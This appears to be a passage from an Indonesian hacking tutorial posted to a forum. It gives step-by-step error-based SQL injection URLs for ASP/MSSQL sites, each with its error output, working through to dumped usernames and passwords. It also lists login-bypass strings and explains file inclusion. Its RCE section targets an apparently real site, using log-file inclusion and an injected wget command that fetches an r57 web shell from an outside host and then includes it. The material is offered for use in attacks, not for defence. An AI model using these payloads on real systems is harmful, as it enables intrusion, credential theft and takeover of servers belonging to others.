nah selesai deh, username n password ada ditangan anda, kalo seandainya
password yang kita dapet di encrypt dengan md5 silahkan crack saja yah,
banyak ko crackan buat md5 yang online tool sekarang. setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya
0x03::SQL injection for ASPsebernernya ini sama saja dengan metode SQL injection yang diatas, tapi
bedanya hanya dibahasa yang digunakan, kalo yang diatas biasa di pk
untuk *.php dan kalo yang ini untuk *.asp..
example:
- Code:
http://inject.web.id/sql.asp?injection=12'
kalo muncul pesan error kaya gini "
- Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/news.asp, line 52
" berarti bisa kita lanjutkan, selain dari itu, coba2 ajah ok...hehehehe :p
lanjutkan dengan
example:
- Code:
http://inject.web.id/sql.asp?injection=12' HAVING 1=1--
error "
- Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC
SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in the
select list because it is not contained in an aggreate function and
there is no GROUP BY clause.
"
cari lagi table dan kolomnya
example:
- Code:
http://inject.web.id/sql.asp?injection=12' GROUP BY news.news_id HAVING 1=1--
error "
- Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC
SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in
the select list because it is not contained in an aggreate function and
there is no GROUP BY clause."
Error menunjukkan nama column yang ketiga adalah "news_detail"
Untuk mencari nama column yang seterusnya, lakukan seperti langkah selanjutnya dengan menambahkan urutan nama-nama column.
Jika pada akhirnya tidak muncul error, berarti sudah tidak ada lagi column yang di dalam table.
Selanjutnya kita akan menggunakan metode yang lain untuk memanfaatkan error MSSQL dengan command "convert".
Contoh command yang akan ditambahkan diakhir URL (setelah parameter id) adalah: +and+1=convert(int,perintah)--
contoh kita akan melihat versi server:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,@@version)--
Pesan error yang muncul:
- Code:
Microsoft SQL Native Client error '80040e07'
Conversion
failed when converting the nvarchar value 'Microsoft SQL Server 2005 -
9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005
Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790:
Service Pack 1) ' to data type int.
/page.asp, line 9
Dari error tersebut kita mengetahui versi Microsoft SQL dan OS-nya.
Untuk mencari nama databasenya
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,db_name())--
Error yang dihasilkan:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9
Berdasarkan error maka dapat diketahui bahwa nama database adalah "cwhdb"
Untuk melihat user yang sementara menggunakan database gunakan command user_name(). contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,user_name())--
Error yang dihasilkan:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9
Error menunjukkan bahwa user adalah "sa"
Sekarang
adalah bagaimana mencari nama table, nama column, dan isinya, dari
table information_schema. Perintahnya:
+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
>>contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
Error yang dihasilkan:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9
Dari
query tersebut, dapat diketahui bahwa "threads" sebagai tipe data
nvarchar dan tidak bisa diconvert ke data tipe int, maka menghasilkan
error.
Dan dengan error tersebut, menunjukkan table yang pertama adalah table "threads".
Selanjutnya mencari table yang kedua. Dengan menambahkan perintah WHERE. contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')))--
/*Penjelasan
perintah tersebut, yaitu kita akan mengambil informasi dari table
information_schema dimana/dengan nama table tidak/bukan "threads". Atau
dengan kata lain kita akan mencari table yang selain table "threads"*/
Maka akan muncul error:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9
Error
menunjukkan table yang kedua adalah "users". Untuk mencari table yang
lain, hanya tambahkan nama table yang telah diketahui. contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')))--
Error yang muncul:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9
Yang berarti nama table yang ketiga adalah table "forums"
Namun jika error yang tampil seperti ini:
- Code:
ADODB.Field
error '800a0bcd' Either BOF or EOF is True, or the current record has
been deleted. Requested operation requires a current record.
/page.asp, line 10
Maka menandakan bahwa semua table telah ditampilkan dan sudah tidak ada lagi table yang lain.
Selanjutnya
mencari nama column dari table. Metodenya hampir sama dengan yang
sebelumnya, yaitu masih mencari dari "information_schema" namun
perintahnya dari "information_schema.tables" berubah menjadi
"information_schema.columns" dan dari "table_name" berubah menjadi
"column_name". contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--
Menampilkan error:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
Dan berdasarkan error diketahui isi column pertama dari table "users" adalah column "uname".
Untuk mencari column yang lain gunakan perintah di akhir URL: and+column_name+not+in+('uname'). contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')))--
Menghasilkan error:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
Berdasarkan error, column yang kedua adalah column "upass" yang terdapat dari table "user".
Untuk mencari column yang lain, tambahkan nama column yang telah kita ketahui sebelumnya. contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')))--
Muncul error:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9
Berarti column yang ketiga adalah column "email".
Tetapi jika error yang dihasilkan adalah:
- Code:
ADODB.Field
error '800a0bcd' Either BOF or EOF is True, or the current record has
been deleted. Requested operation requires a current record.
/page.asp, line 10
Itu menandakan bahwa sudah tidak ada lagi column yang lain.
Last step, adalah mencari isi dari column yang telah kita ketahui. Seperti ini:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users))--
Error yang muncul:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
Berarti isi dari column "uname" yang berada di table "users" datanya adalah "admin".
Untuk mencari user yang lain, gunakan data yang telah kita ketahui. contoh:
example:
- Code:
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--
Jika error yang muncul:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9
Berarti
username yang lain adalah "cwh". Dan untuk mencari user yang
berikutnya, tambahkan username yang telah diketahui. contoh:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--
Dan jika errornya:
- Code:
ADODB.Field
error '800a0bcd' Either BOF or EOF is True, or the current record has
been deleted. Requested operation requires a current record.
/showthread.asp, line 10
Berarti hanya ada 2 user yaitu "admin" dan "cwh".
Dan untuk mencari passwordnya, perintahnya seperti:
example:
- Code:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+upass+from+users))--
Dan jika error yang ditampilkan adalah:
- Code:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value '123' to data type int.
/page.asp, line 9
Maka isi dari data yang pertama di column "upass" adalah "123".
Dari
hasil yang kita dapat diatas, isi data pertama dari column "uname"
adalah "admin", dan isi data pertama dari column "upass" adalah "123".
Berarti usernamenya adalah "admin" dan passwordnya "123"
0x04::bypass Loginbypass adalah teknik hacking untuk login ke suatu site dengan memanfaatkan kesalahan dari si programmer di form login...
begitu kira2 menurut w brother...
ini sedikit list yang biasa di gunakan untuk bypass halaman website:
- Code:
'or'
1'or'1'='1
having 1=1--
x'or'x'='x
dan masih banyak lagi silahkan anda kembangkan dan cari lagi, seperti biasa, in google
0x05::File Inclusionini dia kita memasuki tahap yang dibilang banyak dilakukan oleh para
hacker indonesia yang sering main atau nongkrong di irc,hehehe :p
file inclusion ini terbagi 2 bagian:
1.Remote FIle Inclusion
2.Local File Inclusion
nah sini w bahas yang RFI dulu yah..
RFI
(Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan
attacker meng-include-kan file dari luar server. nah ngerti g tuh
bro...jadi gampangnya gini loh...jadi dari luar server kita bisa
melakukan kaya kita didalam server, nah gitu bro...
nah kemudian LFI
LFI
(Local File Inclusion) adalah sebuah lubang pada site di mana attacker
bisa mengakses semua file di dalam server dengan hanya melalui URL.
nah disni saya akan memberikan bug terjadinya RFI dan LFI..
> [Penjelasan ]
< fungsi-fungsi yang dapat menyebabkan LFI/RFI:
- Code:
include();
include_once(); require(); require_once(); Dengan syarat pada
konfigurasi php di server: allow_url_include = on allow_url_fopen = on
magic_quotes_gpc = off contoh: misalkan kita punya file index.php
dengan content kodenya seperti ini, Code: include
"../$_GET[framefile]"; ?>
0x06::RCE (Remote Command Execution)
RCE...wah
apa tuh baru denger nih...???? wah kaka, masa sih baru denger..ini
adalah salah satu serang yang sering digunakan oleh attacker di
indonesia juga..dari namanya juga kita pasti tahu apakah itu..itu
adalaha bagaiman si attacker mampu menexecute perintah2 dengan meremote
server yang vulnerable dari site
sebagai contoh saya bisa kasih link saja yah tentang RCE ini
untuk mencari RCE anda bisa buka
http://www.milw0rm.com/papers/369untuk bermain RCE dengan LFI, loh bisa baca
http://www.milw0rm.com/papers/361http://www.milw0rm.com/papers/260nah
sisanya anda cari lagi yang mengenai RCE, sebenernya RCE bukan hanya
ada di bug LFI, tapi masih banyak lagi, seperti di phpmyadmin dan
lain-lain..
Bug rce emang lahir karena kesalahan fungsi include file yang gak di
filter dengan baik. jadi but ini bisa lahir di rfi dan lfi. dalam kasus
ini lfi.
darimana bisa tau? simple, include aja log access nya.
example:
Code:
http://isolagrafica.com/webmail//src/redirect.php?plugins%5b%5d=../../../../../../../../../../../../../../../etc/httpd/logs/access_log%00
nemu deh log ini
Code:
http://isolagrafica.com/webmail//src/redirect.php?plugins%5b%5d=../../../../../../../../../../../../../../../etc/httpd/logs/access_log%00&c0li=cd
/tmp;wget http://sundall.net/.log/r57;ls -la
apa yang di lakukan hacker disini?
menginjeksi dengan jurus rce. perhatikan.
%00&c0li=cd /tmp;wget
http://sundall.net/.log/r57;ls -la
setelah memberi nullbyte, parameter di belakangnya akan di anggap
sebagai command. null byte berfungsi sama seperti karakter pipa '|'.
command apa yang doi lakkukan?
cd /tmp; >>> masuk /tmp. napa masok dir ini, karena dir ini
udah pasti perm 777. ini untuk melanjutkan aksi berikutnya.
wget
http://sundall.net/.log/r57; >>> download r57shell ke /tmp/
ls -la; >>> lihat file terdownload or kagak. di step ini, doi udah tau klo filenya terdownload dengan baik.
next step, tinggal include tuh file pakek jurus lfi nya.
Code:
http://isolagrafica.com/webmail//src/redirect.php?plugins%5b%5d=../../../../../../../../../../../../../../../tmp/r57%00
hehe. mantep ya neh jurus. mayan nih nambah jurus kita. sip dah. thankz ichy, thankz c0li.
kesimpulanya, rce bisa di injeksi dengan karakter pipa, nullbyte, titik koma, dan mungkin dengan "???".